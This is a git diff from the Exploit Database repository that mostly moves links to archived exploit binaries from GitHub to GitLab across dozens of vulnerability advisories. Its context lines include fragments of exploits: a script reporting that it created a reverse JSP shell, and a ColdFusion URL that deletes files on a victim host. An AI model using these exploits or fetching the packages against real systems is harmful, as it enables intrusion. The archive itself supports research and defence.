https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar) \ No newline at end of file +Compiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1791.rar (05162006-BL4CK-vncviewer-authbypass.rar) \ No newline at end of file diff --git a/exploits/multiple/remote/1799.txt b/exploits/multiple/remote/1799.txt index 0e752e79c..badea3e2c 100644 --- a/exploits/multiple/remote/1799.txt +++ b/exploits/multiple/remote/1799.txt @@ -1,8 +1,8 @@ class101 - http://heapoverflow.com RealVNC 4.1.0 - 4.1.1 (VNC Null Authentication) Vulnerability Scanners --------------------------------------------------------------------- -windows: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar) -linux: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz) +windows: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1799-1.rar (05172006-VNC_bypauth-win32.rar) +linux: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1799-2.rar (05172006-VNC_bypauth-linux.tar.gz) comments: http://heapoverflow.com/viewtopic.php?p=1729 --------------------------------------------------------------------- diff --git a/exploits/multiple/remote/18245.py b/exploits/multiple/remote/18245.py index 2ea3aeccd..1c17e1b88 100755 --- a/exploits/multiple/remote/18245.py +++ b/exploits/multiple/remote/18245.py @@ -19,7 +19,7 @@ Author: Gary O'leary-Steele @ Sec-1 Ltd Date: 5th September 2011 Release date: Private -Full Package: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18245.zip +Full Package: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18245.zip C:\git\splunk>python splunk_exploit.py -h Usage: Run splunk_exploit.py -h to see usage options @@ -645,5 +645,4 @@ def main(): if __name__ == '__main__': - main() - + main() \ No newline at end of file diff --git a/exploits/multiple/remote/18619.txt b/exploits/multiple/remote/18619.txt index 458feefc2..cfd9aef9d 100644 --- a/exploits/multiple/remote/18619.txt +++ b/exploits/multiple/remote/18619.txt @@ -25,4 +25,4 @@ Enjoy :> /Kingcope -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18619.zip (tomcat-remote.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18619.zip (tomcat-remote.zip) \ No newline at end of file diff --git a/exploits/multiple/remote/18763.txt b/exploits/multiple/remote/18763.txt index 8de508dc1..c3f7f969c 100644 --- a/exploits/multiple/remote/18763.txt +++ b/exploits/multiple/remote/18763.txt @@ -15,7 +15,7 @@ Proof of concept: Code demonstrating the vulnerability can be found at https://github.com/jelmerk/LPS-24562-proof -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18763.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18763.tar.gz Systems affected: diff --git a/exploits/multiple/remote/19093.txt b/exploits/multiple/remote/19093.txt index d2516792c..4ea109b0e 100644 --- a/exploits/multiple/remote/19093.txt +++ b/exploits/multiple/remote/19093.txt @@ -10,4 +10,4 @@ http://www.victim.test/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFileP Now replace the "dummy.txt" string by "ExprCalc.cfm" to delete that file. We can now upload and execute ColdFusion files in the server without them being deleted. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19093.cfm \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19093.cfm \ No newline at end of file diff --git a/exploits/multiple/remote/19451.txt b/exploits/multiple/remote/19451.txt index 2f4bcfc27..d9861c315 100644 --- a/exploits/multiple/remote/19451.txt +++ b/exploits/multiple/remote/19451.txt @@ -41,4 +41,4 @@ Preference: If the preference is not specified, it will use a default of 1000, w 2nd Router Addr: By using the '-r' flag and specifying a second router address entry, the packet can contain a bogus source address and still be processed for correct gateway entries by the end host. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19451.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19451.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/19459.txt b/exploits/multiple/remote/19459.txt index 03c1371a7..290482b2a 100644 --- a/exploits/multiple/remote/19459.txt +++ b/exploits/multiple/remote/19459.txt @@ -4,4 +4,4 @@ Ircd hybrid-6 (up to beta 58) has a vulnerability which can allow remote access This vulnerability is in the invite handling code (m_invite). In a channel with operators (ops) and modes +pi (paranoid + invite-only), a channel invitation is reported to all other operators. The buffer used to store the invitation notice can be overflown by up to 15 bytes. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19459.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19459.tgz \ No newline at end of file diff --git a/exploits/multiple/remote/19749.txt b/exploits/multiple/remote/19749.txt index 9d81927a6..079d32b1a 100644 --- a/exploits/multiple/remote/19749.txt +++ b/exploits/multiple/remote/19749.txt @@ -6,4 +6,4 @@ A potential denial of service (hence forth referred to as DoS) attack exists in The vulnerability exists in the way name servers will behave in the event that they are unable to receive replies for a domain from a nameserver they consider authoritative. When a nameserver receives a query, it is typically forwarded up a chain of DNS server. If the query cannot be resolved because there is no nameserver listening on the remote host, every forwarding nameserver will attempt to resolve the nameserver themselves. These are typically retried three times, at 0, 12 and 24 seconds. In this case, the traffic is significantly multiplied. By abusing multiple nameservers, it becomes possible to send a large quantity of data to a given network, with packet sizes as large as 500 bytes. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19749.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19749.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/20139.txt b/exploits/multiple/remote/20139.txt index fa575ea5f..4f1240254 100644 --- a/exploits/multiple/remote/20139.txt +++ b/exploits/multiple/remote/20139.txt @@ -16,4 +16,4 @@ By combining these two flaws a malicious applet can accept connections from any Both Netscape and Microsoft Java Virtual Machines are affected by this vulnerability, however in Microsoft products the file: URL type will not be effective in reading files, meaning that only web-available documents can be retreived via this method. However, the file: method will verify the existence of a file. It will check to see if the file exists and if it does not, it will return a SecurityException error message. Netscape browsers will pass both web documents and local files to the attacker. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20139.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20139.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/20140.txt b/exploits/multiple/remote/20140.txt index 099fa9bbd..f561af1f8 100644 --- a/exploits/multiple/remote/20140.txt +++ b/exploits/multiple/remote/20140.txt @@ -8,4 +8,4 @@ Netscape's netscape.net.URLConnection and netscape.net.URLInputStream classes se If the machine running the malicious applet is behind a firewall it will also be able to download resources that can be accessed via a URL, such as web server ("http://" or "https://) or FTP servers ("ftp://"), that the attacker in control of the machine from which the applet was downloaded could not. In this way a malicious applet could be used to penetrate a firewall. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20140.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20140.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/20181.txt b/exploits/multiple/remote/20181.txt index 04fb0da0f..55cf907fe 100644 --- a/exploits/multiple/remote/20181.txt +++ b/exploits/multiple/remote/20181.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/1616/info Kerberos is a cryptographic authentication protocol that allows users of a network to access services without transmitting cleartext passwords. A common implementation of the protocol includes a login service which is vulnerable to an attack which involves spoofing responses from the Key Distribution Center (KDC). The login service authenticates a user by first requesting a ticket granting ticket (TGT) from the authentication server. If the TGT can be decrypted using the password supplied by the user, the login service attempts to verify the identity of the KDC by making a request with the received TGT for a service ticket for itself. The service ticket returned by the KDC is encrypted with a secret shared between the KDC and the service host. If the service ticket cannot be verified with the service's secret key it is assumed that the KDC is not authentic. If the login service has not been registered as a principal with the KDC or the service's secret key has not been installed on the host the login service will proceed without verification that the TGT was returned by the authentic KDC. In these circumstances it is possible to log into the server illicitly if an attacker can spoof responses from the Key Distribution Center. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20181.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20181.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/20259.txt b/exploits/multiple/remote/20259.txt index 3fc4df68a..5b5d18c18 100644 --- a/exploits/multiple/remote/20259.txt +++ b/exploits/multiple/remote/20259.txt @@ -8,4 +8,4 @@ After receiving a request to update the Yello Pages maps, 'ypupdated' executes a This is issue is tracked by Sun BugIDs 1230027 and 1232146. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20259.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20259.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/2053.rb b/exploits/multiple/remote/2053.rb index 88d7bbc6a..134875014 100755 --- a/exploits/multiple/remote/2053.rb +++ b/exploits/multiple/remote/2053.rb @@ -84,4 +84,4 @@ system(cmd) sock.close -# milw0rm.com [2006-07-21] +# milw0rm.com [2006-07-21] \ No newline at end of file diff --git a/exploits/multiple/remote/20685.txt b/exploits/multiple/remote/20685.txt index 2a6752f56..68e3398cd 100644 --- a/exploits/multiple/remote/20685.txt +++ b/exploits/multiple/remote/20685.txt @@ -8,4 +8,4 @@ Compromise of the user accounts could result in disclosure of sensitive informat Compromise of administrator accounts could result in disclosure of sensitive information, changes to website functionality, and, potentially, could assist in further compromises of security on the affected host. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20685.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20685.zip \ No newline at end of file diff --git a/exploits/multiple/remote/20738.txt b/exploits/multiple/remote/20738.txt index f979e790c..d614632ed 100644 --- a/exploits/multiple/remote/20738.txt +++ b/exploits/multiple/remote/20738.txt @@ -6,4 +6,4 @@ When a user opens a document for verification in PGP, its corresponding .sig fil Due to a flaw in the implementation of the decoder, an arbitrary file can be created on a users system. The file created would be of the attackers choice. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20738.doc.sig \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20738.doc.sig \ No newline at end of file diff --git a/exploits/multiple/remote/20881.txt b/exploits/multiple/remote/20881.txt index 3f7144c5b..926a48cc9 100644 --- a/exploits/multiple/remote/20881.txt +++ b/exploits/multiple/remote/20881.txt @@ -5,4 +5,4 @@ The IPC@Chip is a single-chip embedded webserver from Beck GmbH. The device's inbuilt telnetd service may allow a remote user to repeatedly attempt to login to a given account, without logging or responding to repeated failed login attempts. This could permit an attacker to brute-force a known account name, potentially leading to a compromise of the device's accounts and/or allowing a compromise of its function. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20881.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20881.zip \ No newline at end of file diff --git a/exploits/multiple/remote/20889.txt b/exploits/multiple/remote/20889.txt index aac305a9a..354790d3e 100644 --- a/exploits/multiple/remote/20889.txt +++ b/exploits/multiple/remote/20889.txt @@ -6,4 +6,4 @@ It is possible for attackers to create an encrypted document that will exploit a This vulnerability may lead to remote attackers gaining access to client hosts. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20889.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20889.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/20891.txt b/exploits/multiple/remote/20891.txt index dceb285ef..705efdded 100644 --- a/exploits/multiple/remote/20891.txt +++ b/exploits/multiple/remote/20891.txt @@ -4,4 +4,4 @@ eSafe Gateway is a security utility used for filtering internet content. An html file may be crafted to bypass the script-filtering feature offered by eSafe Gateway. This is done by simply encoding the <SCRIPT> tag in Unicode format, such that the filter ignores the call to execute the script. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20891.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20891.zip \ No newline at end of file diff --git a/exploits/multiple/remote/21027.txt b/exploits/multiple/remote/21027.txt index 0900a0fd0..6e3057d7b 100644 --- a/exploits/multiple/remote/21027.txt +++ b/exploits/multiple/remote/21027.txt @@ -8,4 +8,4 @@ The default password decryption algorithm employs only a single key, built into Compromise of the webserver's passwords could allow a local attacker to compromise the website's design and function, obtain confidential or security-sensitive information which could lead to further compromises of the host. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21027.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21027.zip \ No newline at end of file diff --git a/exploits/multiple/remote/22029.txt b/exploits/multiple/remote/22029.txt index f4502a733..0f430a1dc 100644 --- a/exploits/multiple/remote/22029.txt +++ b/exploits/multiple/remote/22029.txt @@ -2,10 +2,10 @@ source: https://www.securityfocus.com/bid/6224/info A vulnerability in the Sun and Netscape Java Virtual Machine has been reported. The vulnerability is related to the bytecode verifier, a component of the Java compiler that ensures legal structure of Java instructions. According to the report, it is possible to construct bytecode that will cause objects to be instantiated without proper initialization. One known method of exploiting this vulnerability can allow for read/write access to system files despite the security constraints of the Applet sandbox. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22029-1.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22029-1.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22029-2.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22029-2.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22029-3.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22029-3.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22029-4.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22029-4.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/22093.py b/exploits/multiple/remote/22093.py index dd4d5a277..f5981e4a4 100755 --- a/exploits/multiple/remote/22093.py +++ b/exploits/multiple/remote/22093.py @@ -130,4 +130,4 @@ print "[*] Sending evil payload" resp = opener.open("http://%s:6262/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP" %rhost, post_params) print "[*] Created Reverse JSP shell http://%s:6262/%s" % (rhost,filename) resp = opener.open("http://%s:6262/%s" % (rhost,filename)) -print "[*] Check your shell on %s %s\n" % (lhost,lport) +print "[*] Check your shell on %s %s\n" % (lhost,lport) \ No newline at end of file diff --git a/exploits/multiple/remote/22509.txt b/exploits/multiple/remote/22509.txt index 09d9f99db..a7a9982db 100644 --- a/exploits/multiple/remote/22509.txt +++ b/exploits/multiple/remote/22509.txt @@ -24,7 +24,7 @@ Testcases for the other flaws described in the paper are available on request. https://lock.cmpxchg8b.com/sophail-rev3-exploit.tar.gz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22509.tar.gz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22509.tar.gz It is my understanding that Sophos plan to publish their own advice to their customers today. I have not been given an opportunity to review diff --git a/exploits/multiple/remote/23439.txt b/exploits/multiple/remote/23439.txt index c6707f2f6..276056da2 100644 --- a/exploits/multiple/remote/23439.txt +++ b/exploits/multiple/remote/23439.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/9218/info The mvdsv Quake Server implementation is prone to a remotely exploitable buffer overrun vulnerability. This could permit execution of arbitrary code in the context of the server. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23439.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23439.tar.gz \ No newline at end of file diff --git a/exploits/multiple/remote/23707.txt b/exploits/multiple/remote/23707.txt index 0ea6be38c..756b40a9c 100644 --- a/exploits/multiple/remote/23707.txt +++ b/exploits/multiple/remote/23707.txt @@ -4,4 +4,4 @@ Freeform Interactive Purge and Purge Jihad game clients have been reported prone The issue presents itself in the client network connection routines used by the client to negotiate a connection to a Purge/Purge Jihad game server. A malicious game server may exploit this condition to potentially corrupt sensitive process memory in the affected game client and ultimately execute arbitrary code with the privileges of the user who invoked the game. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/23707.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23707.rar \ No newline at end of file diff --git a/exploits/multiple/remote/24032.txt b/exploits/multiple/remote/24032.txt index 3afdda3bb..2b165663d 100644 --- a/exploits/multiple/remote/24032.txt +++ b/exploits/multiple/remote/24032.txt @@ -18,4 +18,4 @@ Other consequences may also result from this issue, such as injecting specific d **Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24032.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24032.tgz \ No newline at end of file diff --git a/exploits/multiple/remote/24979.txt b/exploits/multiple/remote/24979.txt index d24b187b9..5089a7ed2 100644 --- a/exploits/multiple/remote/24979.txt +++ b/exploits/multiple/remote/24979.txt @@ -4,4 +4,4 @@ A remote, client-side buffer overflow vulnerability affects xlreader. This issue An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24979.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24979.zip \ No newline at end of file diff --git a/exploits/multiple/remote/24980.txt b/exploits/multiple/remote/24980.txt index 5679c7d78..0d4630e0b 100644 --- a/exploits/multiple/remote/24980.txt +++ b/exploits/multiple/remote/24980.txt @@ -4,4 +4,4 @@ Yanf is prone to a buffer overflow vulnerability. This issue is exposed when the If this issue is successfully exploited, it could allow for execution of arbitrary code in the context of the user running the client. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24980.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24980.zip \ No newline at end of file diff --git a/exploits/multiple/remote/24981.txt b/exploits/multiple/remote/24981.txt index 7727445d4..a2973c832 100644 --- a/exploits/multiple/remote/24981.txt +++ b/exploits/multiple/remote/24981.txt @@ -4,4 +4,4 @@ jpegtoavi is prone to a buffer overflow. This issue is exposed when the software If this vulnerability is successfully exploited, it will result in execution of arbitrary code in the context of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24981.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24981.zip \ No newline at end of file diff --git a/exploits/multiple/remote/24982.txt b/exploits/multiple/remote/24982.txt index 2083af51c..dd62f4f5a 100644 --- a/exploits/multiple/remote/24982.txt +++ b/exploits/multiple/remote/24982.txt @@ -4,4 +4,4 @@ Bolthole Filter is prone to a buffer overflow vulnerability. This issue is expos If successfully exploited, this vulnerability could result in execution of arbitrary code in the context of the process. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24982.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24982.zip \ No newline at end of file diff --git a/exploits/multiple/remote/24983.txt b/exploits/multiple/remote/24983.txt index f404677a0..415c5e6b0 100644 --- a/exploits/multiple/remote/24983.txt +++ b/exploits/multiple/remote/24983.txt @@ -4,4 +4,4 @@ Vilistextum is prone to a buffer overflow vulnerability. This issue is exposed w Successful exploitation will allow for execution of arbitrary code in the context of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24983.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24983.zip \ No newline at end of file diff --git a/exploits/multiple/remote/24984.txt b/exploits/multiple/remote/24984.txt index 5f8a2b4e5..a9252df69 100644 --- a/exploits/multiple/remote/24984.txt +++ b/exploits/multiple/remote/24984.txt @@ -4,4 +4,4 @@ source: https://www.securityfocus.com/bid/11980/info Successful exploitation will result in execution of arbitrary code in the context of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24984.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24984.zip \ No newline at end of file diff --git a/exploits/multiple/remote/24995.txt b/exploits/multiple/remote/24995.txt index 1b29e4f4f..295c3515d 100644 --- a/exploits/multiple/remote/24995.txt +++ b/exploits/multiple/remote/24995.txt @@ -4,4 +4,4 @@ A remote, client-side buffer overflow vulnerability reportedly affects the DXFsc An attacker may leverage this issue to execute arbitrary code with the privileges on an unsuspecting user that uses the vulnerable application to process a malicious DXF formatted file. This may facilitate unauthorized access or privilege escalation. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24995.dxf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24995.dxf \ No newline at end of file diff --git a/exploits/multiple/remote/25011.txt b/exploits/multiple/remote/25011.txt index 496498f68..e55bf3b8b 100644 --- a/exploits/multiple/remote/25011.txt +++ b/exploits/multiple/remote/25011.txt @@ -4,4 +4,4 @@ html2hdml is prone to a buffer overflow vulnerability. This issue is exposed whe Successful exploitation may result in execution of arbitrary code in the context of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25011.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25011.zip \ No newline at end of file diff --git a/exploits/multiple/remote/25018.txt b/exploits/multiple/remote/25018.txt index 6eb9deba7..3c74b310f 100644 --- a/exploits/multiple/remote/25018.txt +++ b/exploits/multiple/remote/25018.txt @@ -4,4 +4,4 @@ abc2mtex is prone to a buffer overflow vulnerability. This issue is exposed when Successful exploitation will result in execution of arbitrary code in the context of the user running the application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25018.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25018.zip \ No newline at end of file diff --git a/exploits/multiple/remote/25019.txt b/exploits/multiple/remote/25019.txt index 7fd32e368..612ab55d5 100644 --- a/exploits/multiple/remote/25019.txt +++ b/exploits/multiple/remote/25019.txt @@ -4,6 +4,6 @@ It is reported that abc2midi is susceptible to two stack buffer overflow vulnera These vulnerabilities allow remote attackers to alter the proper flow of execution of the application, potentially resulting in the execution of attacker-supplied machine code in the context of the application attempting to read malicious ABC files. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25019-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25019-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25019-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25019-2.zip \ No newline at end of file diff --git a/exploits/multiple/remote/25028.txt b/exploits/multiple/remote/25028.txt index b00df0564..c6118856b 100644 --- a/exploits/multiple/remote/25028.txt +++ b/exploits/multiple/remote/25028.txt @@ -4,4 +4,4 @@ It is reported that csv2xml is susceptible to a buffer overflow vulnerability. T This vulnerability allow remote attackers to alter the proper flow of execution of the application, potentially resulting in the execution of attacker-supplied machine code in the context of the application attempting to read malicious data. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25028.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25028.zip \ No newline at end of file diff --git a/exploits/multiple/remote/25079.txt b/exploits/multiple/remote/25079.txt index 2bcf1dfa0..41db545e4 100644 --- a/exploits/multiple/remote/25079.txt +++ b/exploits/multiple/remote/25079.txt @@ -4,4 +4,4 @@ Painkiller is reported prone to a remote buffer overflow vulnerability. This iss Painkiller versions 1.35 and prior are reported vulnerable to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25079.tar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25079.tar \ No newline at end of file diff --git a/exploits/multiple/remote/25091.txt b/exploits/multiple/remote/25091.txt index 06d82ee0f..626c0e5e0 100644 --- a/exploits/multiple/remote/25091.txt +++ b/exploits/multiple/remote/25091.txt @@ -6,6 +6,6 @@ Both of these issues require an unsuspecting user to download and activate a mal Successful exploitation of these issues will facilitate code execution and file deletion with the privileges of an unsuspecting user that activates a malicious RealArcade file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25091-1.rgp +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25091-1.rgp -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25091-2.rgs \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25091-2.rgs \ No newline at end of file diff --git a/exploits/multiple/remote/25132.txt b/exploits/multiple/remote/25132.txt index 86a66f33f..34751608c 100644 --- a/exploits/multiple/remote/25132.txt +++ b/exploits/multiple/remote/25132.txt @@ -6,4 +6,4 @@ It is conjectured that a remote attacker may exploit this vulnerability to influ This vulnerability is reported to exist in Bontago versions up to an including version 1.1. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25132.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25132.zip \ No newline at end of file diff --git a/exploits/multiple/remote/25190.txt b/exploits/multiple/remote/25190.txt index a11b73b81..bd4f230c5 100644 --- a/exploits/multiple/remote/25190.txt +++ b/exploits/multiple/remote/25190.txt @@ -12,4 +12,4 @@ The application is also affected by a remote denial of service vulnerability. Ca3DE versions released before March 2004 are affected by these issues. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25190.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25190.zip \ No newline at end of file diff --git a/exploits/multiple/remote/25191.txt b/exploits/multiple/remote/25191.txt index 3bae01bfa..9a7c5ddab 100644 --- a/exploits/multiple/remote/25191.txt +++ b/exploits/multiple/remote/25191.txt @@ -4,4 +4,4 @@ A remote buffer overflow vulnerability affects JoWood Chaser. This issue is due An attacker may leverage this issue to execute arbitrary code in affected clients or trigger a denial of service condition in affected servers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25191.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25191.zip \ No newline at end of file diff --git a/exploits/multiple/remote/25205.txt b/exploits/multiple/remote/25205.txt index fe6f181a0..7a959bc63 100644 --- a/exploits/multiple/remote/25205.txt +++ b/exploits/multiple/remote/25205.txt @@ -4,4 +4,4 @@ A remote format string vulnerability affects XPand Rally. This issue is due to a An attacker may leverage this issue to execute arbitrary code with the privileges of an unsuspecting user that activated the vulnerable server or client application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25205.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25205.zip \ No newline at end of file diff --git a/exploits/multiple/remote/25291.txt b/exploits/multiple/remote/25291.txt index e990b6da4..87e5202a2 100644 --- a/exploits/multiple/remote/25291.txt +++ b/exploits/multiple/remote/25291.txt @@ -6,4 +6,4 @@ It is reported that this issue exists in the function responsible for logging us A successful attack can allow an attacker to gain unauthorized access to a vulnerable computer in the context of a game server. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25291.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25291.zip \ No newline at end of file diff --git a/exploits/multiple/remote/25574.txt b/exploits/multiple/remote/25574.txt index 047465583..34b5f96dd 100644 --- a/exploits/multiple/remote/25574.txt +++ b/exploits/multiple/remote/25574.txt @@ -4,6 +4,6 @@ A remote format string vulnerability affects Mtp-Target Client. This issue is du An attacker may leverage this issue to execute arbitrary code with the privileges of an unsuspecting user that activated the vulnerable client application. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25574-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25574-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25574-2.zip \ No newline at end of file 